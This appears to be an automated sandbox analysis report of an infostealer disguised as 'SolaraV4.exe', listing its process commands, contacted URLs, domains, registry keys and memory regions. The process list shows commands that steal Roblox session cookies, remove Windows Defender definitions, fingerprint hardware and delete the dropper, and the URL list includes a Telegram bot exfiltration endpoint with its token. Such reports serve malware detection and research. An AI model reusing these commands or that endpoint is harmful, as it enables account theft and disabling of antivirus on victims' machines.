C:\Windows\system32\cmd.exe /c "tree /A /F"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
malicious
C:\Windows\System32\tree.com
tree /A /F
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
malicious
C:\Windows\System32\tree.com
tree /A /F
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
malicious
C:\Windows\System32\tree.com
tree /A /F
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
malicious
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe a -r -hp"qwerty123" "C:\Users\user\AppData\Local\Temp\6zHpy.zip" *"
malicious
C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe
C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe a -r -hp"qwerty123" "C:\Users\user\AppData\Local\Temp\6zHpy.zip" *
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
malicious
C:\Windows\System32\wbem\WMIC.exe
wmic os get Caption
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
malicious
C:\Windows\System32\wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
malicious
C:\Windows\System32\wbem\WMIC.exe
wmic csproduct get uuid
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
malicious
C:\Windows\System32\wbem\WMIC.exe
wmic path win32_VideoController get name
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\SolaraV4.exe""
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\mshta.exe
mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Please update software. OLD VERSION', 0, 'Error', 32+16);close()"
C:\Windows\System32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\System32\SIHClient.exe
C:\Windows\System32\sihclient.exe /cv ANBeg33fjE+FOmtUGvWY6g.0.2
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6CAA.tmp" "c:\Users\user\AppData\Local\Temp\myx0gned\CSC193A8B703A1D4F08B0E861F82E42C2AF.TMP"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 117 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://api.telegram.org/bot7576687091:AAHc9LHp1oJNmPES1PMfu8JQQ9jVtHibTlc/sendDocument
149.154.167.220
malicious
https://duckduckgo.com/chrome_newtab
unknown
https://github.com/Blank-c/BlankOBF
unknown
https://api.telegram.org/bot%s/%s
unknown
https://www.avito.ru/
unknown
https://duckduckgo.com/ac/?q=
unknown
https://github.com/Blank-c/Blank-Grabberi
unknown
https://www.ctrip.com/
unknown
http://ip-api.com/line/?fields=hostingr=r
unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.P9ZDdyXKOWl2
unknown
https://g.live.com/odclientsettings/ProdV2.C:
unknown
https://python.org/dev/peps/pep-0263/
unknown
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
unknown
http://www.microsoftDOWNLO~1epository.
unknown
https://www.leboncoin.fr/
unknown
https://tools.ietf.org/html/rfc2388#section-4.4
unknown
https://g.live.com/odclientsettings/Prod.C:
unknown
https://api.anonfiles.com/upload
unknown
https://www.msn.com
unknown
https://nuget.org/nuget.exe
unknown
https://discord.com/api/v9/users/
unknown
https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
unknown
http://www.microsoft.c
unknown
https://www.reddit.com/
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://www.amazon.ca/
unknown
http://json.org
unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
unknown
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
unknown
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
unknown
https://www.ebay.co.uk/
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
https://www.ebay.de/
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
unknown
https://go.micro
unknown
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
unknown
https://www.amazon.com/
unknown
http://crl.mic
unknown
https://contoso.com/Icon
unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
unknown
https://httpbin.org/
unknown
http://crl.ver)
unknown
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
unknown
https://www.ecosia.org/newtab/
unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
unknown
https://www.youtube.com/
unknown
https://github.com/Pester/Pester
unknown
http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
unknown
https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
unknown
https://MD8.mozilla.org/1/m
unknown
https://api.gofile.io/getServerr=r
unknown
https://bugzilla.mo
unknown
http://tools.ietf.org/html/rfc6125#section-6.4.3
unknown
https://api.telegram.org/bot%s/%s)
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings.
unknown
https://google.com/mail
unknown
https://packaging.python.org/specifications/entry-points/
unknown
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
unknown
https://www.google.com/
unknown
https://foss.heptapod.net/pypy/pypy/-/issues/3539
unknown
https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
unknown
http://google.com/
unknown
http://ocsp.sectigo.com0
unknown
https://www.python.org/download/releases/2.3/mro/.
unknown
https://contoso.com/License
unknown
https://discordapp.com/api/v9/users/
unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
unknown
http://ip-api.com/line/?fields=hostingr=
unknown
http://ip-api.com/json/?fields=225545r
unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
unknown
https://github.com/urllib3/urllib3/issues/2920
unknown
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
unknown
http://crl3.digi
unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
unknown
https://yahoo.com/
unknown
https://account.bellmedia.c
unknown
http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
unknown
https://login.microsoftonline.com
unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0
unknown
https://html.spec.whatwg.org/multipage/
unknown
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
unknown
https://www.rfc-editor.org/rfc/rfc8259#section-8.1
unknown
https://contoso.com/
unknown
https://github.com/Unidata/MetPy/bl
unknown
http://crl.micft.cMicRosof
unknown
http://crl4.digice
unknown
https://api.gofile.io/getServer
unknown
https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png
unknown
http://nuget.org/NuGet.exe
unknown
http://www.apache.org/licenses/LICENSE-2.0
unknown
https://sectigo.com/CPS0
unknown
http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
unknown
There are 90 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
ip-api.com
208.95.112.1
malicious
api.telegram.org
149.154.167.220
malicious
blank-kf3va.in
unknown
malicious

IPs

IP
Domain
Country
Malicious
208.95.112.1
ip-api.com
United States
malicious
149.154.167.220
api.telegram.org
United Kingdom
malicious
127.0.0.1
unknown
unknown

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Multimedia\DrawDib
1280x1024x32(BGR 0)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\1f\417C44EB
@%SystemRoot%\system32\mlang.dll,-4387
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\1f\417C44EB
@%SystemRoot%\system32\mlang.dll,-4407

Memdumps

Base Address
Regiontype
Protect
Malicious
24132FE8000
heap
page read and write
malicious
2125C3B6000
heap
page read and write
malicious
24132D70000
direct allocation
page read and write
malicious
2125C3B4000
heap
page read and write
malicious
24133496000
heap
page read and write
malicious
24133565000
heap
page read and write
malicious
24132FF2000
heap
page read and write
malicious
1DA02113000
heap
page read and write
88ED97E000
unkown
page readonly
7FF6FFC8E000
unkown
page read and write
109D6FB000
stack
page read and write
1FABFC5C000
heap
page read and write
20492B5C000
heap
page read and write
1DBD84C0000
heap
page read and write
7FFE15ED0000
trusted library allocation
page read and write
2125C3B1000
heap
page read and write
7FFE90591000
unkown
page execute and read and write
2533EA41000
heap
page read and write
2533F26F000
heap
page read and write
20C95746000
heap
page read and write
1F61A40D000
heap
page read and write
109D2FE000
stack
page read and write
2089C99D000
heap
page read and write
270AE649000
heap
page read and write
1DA0009F000
heap
page read and write
2089AFA9000
heap
page read and write
24132E88000
heap
page read and write
25340B0D000
heap
page read and write
24132C10000
heap
page read and write
1DA02114000
heap
page read and write
241334B0000
heap
page read and write
1DBD7F44000
heap
page read and write
24133542000
heap
page read and write
1DBD84F5000
heap
page read and write
2413365E000
heap
page read and write
2533EA42000
heap
page read and write
29ADF740000
heap
page read and write
1FABFC79000
heap
page read and write
1DA0211E000
heap
page read and write
1DBD84E9000
heap
page read and write
1ED46C86000
heap
page read and write
24133667000
heap
page read and write
20492B44000
heap
page read and write
20492B41000
heap
page read and write
2A2CC790000
heap
page read and write
7FFE90B7D000
unkown
page read and write
7FFE75EF0000
unkown
page execute and read and write
1984C8B0000
heap
page read and write
1ED46C66000
heap
page read and write
FC519FC000
stack
page read and write
1ED46EB0000
heap
page read and write
24132C19000
heap
page read and write
23639BF4000
heap
page read and write
20492AD1000
heap
page read and write
20C9574D000
heap
page read and write
24133506000
heap
page read and write
69991FE000
unkown
page read and write
253DA910000
direct allocation
page read and write
24132C3F000
heap
page read and write
1C46ED10000
heap
page read and write
1DACCED6000
heap
page read and write
109D3FF000
stack
page read and write
7FFE15C72000
trusted library allocation
page read and write
1D3E25A7000
heap
page read and write
7FFE15AB0000
trusted library allocation
page read and write
7FFE15CB0000
trusted library allocation
page read and write
7FFE94ACC000
unkown
page read and write
241334A6000
heap
page read and write
24133041000
heap
page read and write
24130A6A000
heap
page read and write
24133041000
heap
page read and write
1AEA6E2F000
heap
page read and write
1ED0FC60000
heap
page read and write
20C95675000
heap
page read and write
1CAA8054000
heap
page read and write
24AB7604000
heap
page read and write
1616FC6E000
heap
page read and write
1DAD0180000
heap
page read and write
270AEF5C000
heap
page read and write
1FABFC58000
heap
page read and write
2049450E000
trusted library allocation
page read and write
24133579000
heap
page read and write
24133C18000
heap
page read and write
17134AA0000
heap
page read and write
161B1970000
heap
page execute and read and write
19851F70000
remote allocation
page read and write
7FFE957E7000
unkown
page readonly
174CED7D000
heap
page read and write
1616FC74000
heap
page read and write
1E02DCC1000
heap
page read and write
1F16B28D000
heap
page read and write
241334A4000
heap
page read and write
2089AA91000
heap
page read and write
24132B91000
heap
page read and write
24132C07000
heap
page read and write
16199BB8000
trusted library allocation
page read and write
1E02DCC1000
heap
page read and write
1F16B935000
heap
page read and write
1616DD80000
trusted library allocation
page read and write
24132BD0000
heap
page read and write
1619ACE6000
trusted library allocation
page read and write
1F1A8D74000
heap
page read and write
253DC330000
direct allocation
page read and write
2533F292000
heap
page read and write
1ED46C57000
heap
page read and write
24438270000
heap
page read and write
24133525000
heap
page read and write
20492B17000
heap
page read and write
2533E9E7000
heap
page read and write
1F16B286000
heap
page read and write
2413340C000
heap
page read and write
FC5187E000
stack
page read and write
1DA002C8000
heap
page read and write
7FFE904F3000
unkown
page execute and read and write
270AE649000
heap
page read and write
2413364A000
heap
page read and write
7FFE75D94000
unkown
page execute and read and write
C12DF0C000
stack
page read and write
20494509000
trusted library allocation
page read and write
1ED0FC80000
heap
page read and write
2360FBC0000
heap
page read and write
24133501000
heap
page read and write
271487D0000
heap
page read and write
1E2C990A000
heap
page read and write
237533C0000
heap
page read and write
1DBD7D24000
heap
page read and write
24133558000
heap
page read and write
1FABF68F000
heap
page read and write
2413356A000
heap
page read and write
88EE37E000
unkown
page readonly
20492ACE000
heap
page read and write
2049450B000
trusted library allocation
page read and write
24130AA2000
heap
page read and write
1FABF677000
heap
page read and write
1F8780A1000
heap
page read and write
241334B0000
heap
page read and write
CC066FF000
stack
page read and write
7FFE905AF000
unkown
page execute and read and write
152B52D8000
heap
page read and write
1616FC66000
heap
page read and write
3A0E54F000
stack
page read and write
2533F278000
heap
page read and write
1DA00822000
heap
page read and write
109D8FE000
stack
page read and write
1BFE6CC0000
heap
page read and write
1616DCA7000
heap
page read and write
2D879C70000
trusted library allocation
page read and write
88EE1FE000
stack
page read and write
7FF7C71E0000
unkown
page readonly
20492B12000
heap
page read and write
1F16B250000
heap
page read and write
244381D0000
heap
page read and write
2D801DDB000
trusted library allocation
page read and write
1F16B254000
heap
page read and write
20492B62000
heap
page read and write
2089B0AE000
heap
page read and write
20C94ADA000
trusted library allocation
page read and write
1DB1C580000
heap
page read and write
20492B66000
heap
page read and write
2985EFF000
stack
page read and write
2413348F000
heap
page read and write
24133FBC000
heap
page read and write
7FF6FFC50000
unkown
page readonly
241333F6000
heap
page read and write
253D8E65000
heap
page read and write
24133506000
heap
page read and write
24133641000
heap
page read and write
2089AA9C000
heap
page read and write
1DA00250000
trusted library allocation
page read and write
1FB14590000
heap
page read and write
1ED47208000
heap
page read and write
24132C48000
heap
page read and write
24133F9D000
heap
page read and write
1DF55020000
heap
page read and write
270AE5F6000
heap
page read and write
24133473000
heap
page read and write
2413351F000
heap
page read and write
20C94AE0000
heap
page readonly
FC5137E000
stack
page read and write
20492B27000
heap
page read and write
1DAD0152000
heap
page read and write
2125C3B1000
heap
page read and write
18859B7B000
heap
page read and write
2413366F000
heap
page read and write
1ED47234000
heap
page read and write
24132C0F000
heap
page read and write
23FDF070000
heap
page read and write
270AEF61000
heap
page read and write
270AE62C000
heap
page read and write
23639991000
heap
page read and write
7FFE15AB3000
trusted library allocation
page execute and read and write
1FABF8EA000
heap
page read and write
2533EA22000
heap
page read and write
7FFE15C41000
trusted library allocation
page read and write
2413350F000
heap
page read and write
24132BFA000
heap
page read and write
1DBD9E76000
heap
page read and write
1DBD84EA000
heap
page read and write
20C95BD0000
heap
page read and write
2A2CC65B000
heap
page read and write
1B7EED0B000
heap
page read and write
1DBD84E0000
heap
page read and write
1ED46C0E000
heap
page read and write
253DC2F0000
direct allocation
page read and write
270AE71C000
heap
page read and write
241338C9000
heap
page read and write
241334A6000
heap
page read and write
270AF0E7000
heap
page read and write
24133556000
heap
page read and write
1C8A6060000
heap
page read and write
1DAD01A6000
heap
page read and write
27148B30000
heap
page read and write
1DA0009B000
heap
page read and write
20C95680000
heap
page read and write
1F1A8AC7000
heap
page read and write
1AEA6E28000
heap
page read and write
2360FBFA000
heap
page read and write
291970E0000
heap
page read and write
20D80591000
heap
page read and write
24133514000
heap
page read and write
24AB71A0000
heap
page read and write
1B5C2598000
heap
page read and write
24133D37000
heap
page read and write
F933DFF000
unkown
page read and write
1DAD01A6000
heap
page read and write
2413350C000
heap
page read and write
7FFE90B7B000
unkown
page execute and write copy
7A99FFF000
unkown
page read and write
7FFE15BB0000
trusted library allocation
page execute and read and write
1616DC97000
heap
page read and write
7FFE75DA1000
unkown
page execute and read and write
198520DF000
heap
page read and write
3B055FE000
stack
page read and write
2360FCB2000
heap
page read and write
24132C16000
heap
page read and write
24133475000
heap
page read and write
24133FD4000
heap
page read and write
1FABF64F000
heap
page read and write
2533F277000
heap
page read and write
2413352F000
heap
page read and write
29AF1FE5000
heap
page read and write
1DAD0164000
heap
page read and write
20494524000
heap
page read and write
1AEA7140000
heap
page read and write
1DBD7CF1000
heap
page read and write
1984C87A000
heap
page read and write
20C95673000
heap
page read and write
2A2CC770000
heap
page read and write
161B1C80000
heap
page read and write
1E02DFF0000
heap
page read and write
270AF331000
heap
page read and write
24132EA4000
heap
page read and write
2089AA77000
heap
page read and write
241334FB000
heap
page read and write
109D77E000
stack
page read and write
1DAD014A000
heap
page read and write
241334F4000
heap
page read and write
2089AB50000
heap
page read and write
24133487000
heap
page read and write
24133B11000
heap
page read and write
1985204D000
heap
page read and write
20492B12000
heap
page read and write
18207AD1000
heap
page read and write
2533E9E2000
heap
page read and write
1C8A6056000
heap
page read and write
7FF7C7274000
unkown
page read and write
2125C3B1000
heap
page read and write
24133407000
heap
page read and write
241333BA000
heap
page read and write
1FABFC7B000
heap
page read and write
CD4F68B000
stack
page read and write
20492A70000
heap
page read and write
25340B03000
heap
page read and write
271489D0000
heap
page read and write
24130A56000
heap
page read and write
2360FCBD000
heap
page read and write
2C160CA0000
heap
page read and write
359F2DB000
stack
page read and write
1FABF646000
heap
page read and write
235D1751000
heap
page read and write
270AF0EA000
heap
page read and write
2533EA05000
heap
page read and write
7FFE78644000
unkown
page execute and read and write
7FF6FFC94000
unkown
page readonly
1FABF688000
heap
page read and write
2A2CC650000
heap
page read and write
1DA002C9000
heap
page read and write
359F77F000
stack
page read and write
20492B12000
heap
page read and write
1AEA6E28000
heap
page read and write
910B2FF000
unkown
page read and write
2D87BE70000
heap
page read and write
1FABF628000
heap
page read and write
24133476000
heap
page read and write
2533EBE0000
trusted library allocation
page read and write
2413366B000
heap
page read and write
1ED46C57000
heap
page read and write
241334A6000
heap
page read and write
1F16B286000
heap
page read and write
2D879BD0000
heap
page read and write
436F3EF000
stack
page read and write
1616DE24000
heap
page read and write
284F33F0000
heap
page read and write
1CAA7CE0000
heap
page read and write
24132B7D000
heap
page read and write
88EE67C000
stack
page read and write
29AF1C51000
heap
page read and write
284F3450000
heap
page read and write
24130A63000
heap
page read and write
1DBD84F2000
heap
page read and write
7FF6FFC8E000
unkown
page read and write
1E02DE70000
heap
page read and write
2D879BF0000
heap
page read and write
1DBD7D26000
heap
page read and write
7FFE8F418000
unkown
page execute and read and write
6808EFC000
stack
page read and write
161B1844000
heap
page read and write
FC51677000
stack
page read and write
2360FCB2000
heap
page read and write
2089AAAD000
heap
page read and write
1984CA10000
heap
page read and write
2533ECDA000
heap
page read and write
2E76BFF000
stack
page read and write
1E02DFF4000
heap
page read and write
24133521000
heap
page read and write
271489F0000
heap
page read and write
24130B80000
heap
page read and write
253D8E28000
heap
page read and write
161A9701000
trusted library allocation
page read and write
7FFE761E1000
unkown
page execute and read and write
7FFE15AB4000
trusted library allocation
page read and write
1F16B190000
heap
page read and write
1984D11A000
heap
page read and write
253D8E71000
heap
page read and write
7C2DBFF000
stack
page read and write
24133483000
heap
page read and write
24133D23000
heap
page read and write
1DBD84F9000
heap
page read and write
25340B14000
heap
page read and write
29196FC1000
heap
page read and write
1FABF66B000
heap
page read and write
226F4CE9000
heap
page read and write
24AB7600000
heap
page read and write
16197882000
heap
page read and write
161B1900000
heap
page execute and read and write
24133F93000
heap
page read and write
2D879CE9000
heap
page read and write
24133DAC000
heap
page read and write
235D16A0000
heap
page read and write
1ED46C5A000
heap
page read and write
7FF6FFC94000
unkown
page readonly
2B4B8931000
heap
page read and write
270AE649000
heap
page read and write
CC064FC000
stack
page read and write
1B7EF080000
heap
page read and write
2413366B000
heap
page read and write
1DBD7D01000
heap
page read and write
C12E3FF000
stack
page read and write
1F16B241000
heap
page read and write
2533EA08000
heap
page read and write
1F16B286000
heap
page read and write
7DF47ED70000
trusted library allocation
page execute and read and write
1DAD0BBF000
heap
page read and write
7FFE15AA0000
trusted library allocation
page read and write
2F0907F000
stack
page read and write
109CF23000
stack
page read and write
1DA00083000
heap
page read and write
1C8A5FF5000
heap
page read and write
1DA002D1000
heap
page read and write
24ECC630000
heap
page read and write
253D8E53000
heap
page read and write
2360FCAB000
heap
page read and write
24133964000
direct allocation
page read and write
17134BD4000
heap
page read and write
2D87B690000
heap
page read and write
174CEEE4000
heap
page read and write
18D34757000
heap
page read and write
2533EA26000
heap
page read and write
1AEA6DE0000
heap
page read and write
2413338C000
heap
page read and write
3A0DFFE000
stack
page read and write
7FF7C7268000
unkown
page read and write
18859B7B000
heap
page read and write
1DF54F20000
heap
page read and write
1ED46C0E000
heap
page read and write
2C160BC4000
heap
page read and write
25340B0E000
heap
page read and write
7FFE15D70000
trusted library allocation
page read and write
1ED46C8B000
heap
page read and write
7FFE15B76000
trusted library allocation
page execute and read and write
1DAD017A000
heap
page read and write
1F16B241000
heap
page read and write
2413352F000
heap
page read and write
20492B1E000
heap
page read and write
C12E2FF000
unkown
page read and write
1ED47231000
heap
page read and write
174CEEE0000
heap
page read and write
1ED47233000
heap
page read and write
1616DC52000
heap
page read and write
88EE079000
stack
page read and write
1F1A8A20000
heap
page read and write
1616DE08000
heap
page read and write
2413350A000
heap
page read and write
1DA002C8000
heap
page read and write
1AEA6E03000
heap
page read and write
9F87CDC000
stack
page read and write
1DA002B3000
heap
page read and write
270AE69A000
heap
page read and write
2C160D30000
heap
page read and write
1616FC6E000
heap
page read and write
1ED47210000
heap
page read and write
1616DCAA000
heap
page read and write
270AE5D2000
heap
page read and write
161977D0000
heap
page read and write
1ED46C02000
heap
page read and write
1FABF623000
heap
page read and write
1DBD837A000
heap
page read and write
270AE4A0000
heap
page read and write
1F16B258000
heap
page read and write
1DA000AE000
heap
page read and write
6E735BF000
stack
page read and write
1C46EC28000
heap
page read and write
1D3E25AB000
heap
page read and write
FC524CB000
stack
page read and write
174CED70000
heap
page read and write
7FFE15D00000
trusted library allocation
page read and write
7FFE15A9D000
trusted library allocation
page execute and read and write
20C94874000
heap
page read and write
2413364A000
heap
page read and write
161B1976000
heap
page execute and read and write
2413352F000
heap
page read and write
253D8E44000
heap
page read and write
AB1B4FE000
stack
page read and write
1DACED10000
heap
page read and write
2413366B000
heap
page read and write
3B9AAFB000
stack
page read and write
24133641000
heap
page read and write
24132E80000
heap
page read and write
152B52E1000
heap
page read and write
9D3A7AC000
stack
page read and write
1DACEF40000
heap
page read and write
1DACEFB3000
heap
page read and write
17134AEC000
heap
page read and write
24133564000
heap
page read and write
AB1AFA6000
stack
page read and write
2413344D000
heap
page read and write
1DBD7C67000
heap
page read and write
21A1A209000
heap
page read and write
2413354D000
heap
page read and write
1ED46C7E000
heap
page read and write
24130A8A000
heap
page read and write
2125C3B1000
heap
page read and write
1DAD010C000
heap
page read and write
7FF7C728E000
unkown
page readonly
2413366B000
heap
page read and write
1984CAF0000
heap
page read and write
1DBD8374000
heap
page read and write
253D8E8E000
heap
page read and write
1984C813000
heap
page read and write
1FB143A7000
heap
page read and write
2221A581000
heap
page read and write
2263E5D1000
heap
page read and write
20C95670000
heap
page read and write
24132EA4000
heap
page read and write
1984C8FF000
heap
page read and write
1B5C2830000
heap
page read and write
2533F268000
